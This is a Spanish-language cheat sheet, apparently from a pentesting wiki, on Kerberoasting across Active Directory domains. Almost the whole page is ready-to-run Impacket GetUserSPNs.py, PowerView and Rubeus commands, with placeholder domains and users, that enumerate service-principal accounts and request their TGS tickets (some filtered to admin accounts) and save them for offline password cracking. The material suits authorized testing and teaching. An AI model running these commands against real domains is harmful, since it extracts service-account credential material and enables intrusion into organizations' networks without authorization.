Kerberoast

Linux/Unix

Impacket

Obtener cuentas Service Principal Names (SPN) del dominio objetivo.

GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user>

Obtener Ticket Granting Service (TGS) del dominio objetivo.

GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request -outputfile tgs.txt

Obtener Ticket Granting Service (TGS) de una cuenta en el dominio objetivo.

GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request-user <user-SPN>
GetUserSPNs.py -target-domain <TARGET.ACME.LOCAL> <ACME.LOCAL>/<user> -request-user <user-SPN> -outputfile tg

Windows

PowerView

Obtener cuentas Service Principal Names (SPN) del dominio objetivo.

Get-DomainUser -SPN -Domain <ACME.LOCAL> | select SamAccountName

Enumeración de grupos a los cuales pertence la cuenta Service Principal Names (SPN) en el dominio objetivo.

Get-DomainUser -Domain <ACME.LOCAL> -Identity <user-SPN> | select SamAccountName, MemberOf

Rubeus

Obtener estadísticas de usuarios del dominio objetivo.

.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /stats

Obtener Ticket Granting Service (TGS) del dominio objetivo.

.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /nowrap
.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /ldapfilter:'admincount=1' /nowrap

Obtener Ticket Granting Service (TGS) de una cuenta en el dominio objetivo.

.\Rubeus.exe kerberoast /domain:<ACME.LOCAL> /user:<user> /nowrap
AnteriorConstrained delegationSiguienteForeign group membership

Última actualización